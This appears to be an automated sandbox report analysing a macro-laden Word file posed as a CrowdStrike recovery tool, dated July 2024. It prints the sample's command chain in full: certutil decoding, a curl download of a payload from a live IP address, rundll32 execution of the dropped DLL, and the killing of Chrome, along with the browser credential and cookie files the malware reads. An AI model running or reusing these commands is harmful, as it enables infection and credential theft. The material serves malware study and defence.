w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

13_2_008B155B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,

13_2_0087D33A

Enables debug privileges

Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008B0CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_008B0CB4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_008B155B
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008B16BE SetUnhandledExceptionFilter,	13_2_008B16BE
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C91410 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FFD92C91410
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C09FB0 SetUnhandledExceptionFilter,	16_2_00007FFD92C09FB0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C09D50 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FFD92C09D50
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C08970 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FFD92C08970
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00880CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00880CB4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0088155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_0088155B
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_008816BE SetUnhandledExceptionFilter,	33_2_008816BE

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 172.104.160.126 5000

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA stomping: true
Source: ~WRC0000.tmp.26.dr	OLE indicator, VBA stomping: true

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Uses taskkill to terminate processes

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_008B137A cpuid

13_2_008B137A

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,	16_2_00007FFD92CD7430
Source: C:\Windows\System32\rundll32.exe	Code function: __vcrt_getptd,__vcrt_getptd,GetLcidFromDefault,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	16_2_00007FFD92CD76C0
Source: C:\Windows\System32\rundll32.exe	Code function: __crt_fast_encode_pointer,EnumSystemLocalesW,	16_2_00007FFD92CBDD50
Source: C:\Windows\System32\rundll32.exe	Code function: __vcrt_getptd,EnumSystemLocalesW,	16_2_00007FFD92CD6AA0
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoEx,FormatMessageA,	16_2_00007FFD92C0AAC0
Source: C:\Windows\System32\rundll32.exe	Code function: __vcrt_getptd,EnumSystemLocalesW,	16_2_00007FFD92CD6B70
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	16_2_00007FFD92CBEB80
Source: C:\Windows\System32\rundll32.exe	Code function: __vcrt_getptd,EnumSystemLocalesW,	16_2_00007FFD92CD6C80

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\result.txt VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\result.txt VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_008B1775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

13_2_008B1775

Source: C:\Windows\System32\rundll32.exe

Code function: 16_2_00007FFD92CC8F40 _invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,GetTimeZoneInformation,

16_2_00007FFD92CC8F40

Source: C:\Windows\SysWOW64\certutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\System32\rundll32.exe

Code function: \Google\Chrome\User Data\Default\Login Data

16_2_00007FFD92BE1290

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0089A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,	13_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008A699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	13_2_008A699F
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_00898490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,	13_2_00898490
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0087DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	13_2_0087DEDF
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C496B0 _mbsset_s,_mbsset_s,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,	16_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C3DF49 bind,WSAGetLastError,	16_2_00007FFD92C3DF49
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C37F90 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,	16_2_00007FFD92C37F90
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C543E0 htons,_mbsset_s,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	16_2_00007FFD92C543E0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C3E1E0 bind,WSAGetLastError,	16_2_00007FFD92C3E1E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0086A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,	33_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	33_2_0087699F
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00868490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,	33_2_00868490
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0084DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	33_2_0084DEDF

ID:	1478411
Product:	CloudBasic
Start time:	15:56:51
Start date:	22.07.2024
Sample:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	dd2100dfa067caae416b885637adc4ef
SHA1:	499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:	803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Filetype:	Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm